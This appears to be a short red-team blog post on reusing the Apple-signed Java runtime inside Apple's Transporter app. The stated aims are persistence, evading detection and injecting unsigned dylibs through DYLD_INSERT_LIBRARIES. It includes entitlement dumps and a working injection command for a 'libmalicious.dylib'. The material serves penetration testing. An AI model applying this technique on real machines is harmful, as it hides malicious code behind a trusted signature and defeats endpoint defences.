macOS Red Teaming Tricks series
The idea of #macOSRedTeamingTricks series is to share simple & ready-to-use tricks that may help you during macOS red teaming engagements
The trick
There were a lot of different code execution & persistence methods on macOS, also those that include delivering your own interpreters/environments like Java. Recently, I found out that Apple’s Transporter app contains a working Java environment. So if you need Java binary signed directly with the Apple Dev-ID certificate go and grab it!
Why it may be useful?
- that Java executable file will look less suspicious because it is signed with the Apple Dev-ID certificate so you may avoid some detections
- you can create for example a launch agent that will execute your jar with the
-jarflag - it allows injecting adhoc signed dynamic libraries even on M1 Macs
Signature
% codesign -d -vv /Applications/Transporter.app/Contents/itms/java/bin/java
Executable=/Applications/Transporter.app/Contents/itms/java/bin/java
Identifier=net.java.openjdk.cmd
Format=Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=768 flags=0x10000(runtime) hashes=13+7 location=embedded
Signature size=4698
Authority=Apple Mac OS Application Signing
Authority=Apple Worldwide Developer Relations Certification Authority
Authority=Apple Root CA
Info.plist entries=4
TeamIdentifier=K36BKF7T3D
Runtime Version=11.0.0
Sealed Resources=none
Internal requirements count=1 size=220
Entitlements
% codesign -d --entitlements - /Applications/Transporter.app/Contents/itms/java/bin/java
Executable=/Applications/Transporter.app/Contents/itms/java/bin/java
[Dict]
[Key] com.apple.security.cs.debugger
[Value]
[Bool] true
[Key] com.apple.security.cs.allow-jit
[Value]
[Bool] true
[Key] com.apple.security.device.audio-input
[Value]
[Bool] true
[Key] com.apple.security.cs.disable-library-validation
[Value]
[Bool] true
[Key] com.apple.security.cs.allow-dyld-environment-variables
[Value]
[Bool] true
[Key] com.apple.security.cs.allow-unsigned-executable-memory
[Value]
[Bool] true
Architectures
Works both on x86 and arm
% lipo -archs /Applications/Transporter.app/Contents/itms/java/bin/java
x86_64 arm64
Code injection on M1 :-)
% DYLD_INSERT_LIBRARIES=./libmalicious.dylib /Applications/Transporter.app/Contents/itms/java/bin/java --version
2022-07-11 13:37:00.000 java[9121:59191] [+] Dylib injected
openjdk 14.0.2 2020-07-14
OpenJDK Runtime Environment 14.0.2-5906ce1373 (fastdebug build 14.0.2+12-iTunesOpenJDK-8)
OpenJDK 64-Bit Zero VM 14.0.2-5906ce1373 (fastdebug build 14.0.2+12-iTunesOpenJDK-8, interpreted mode)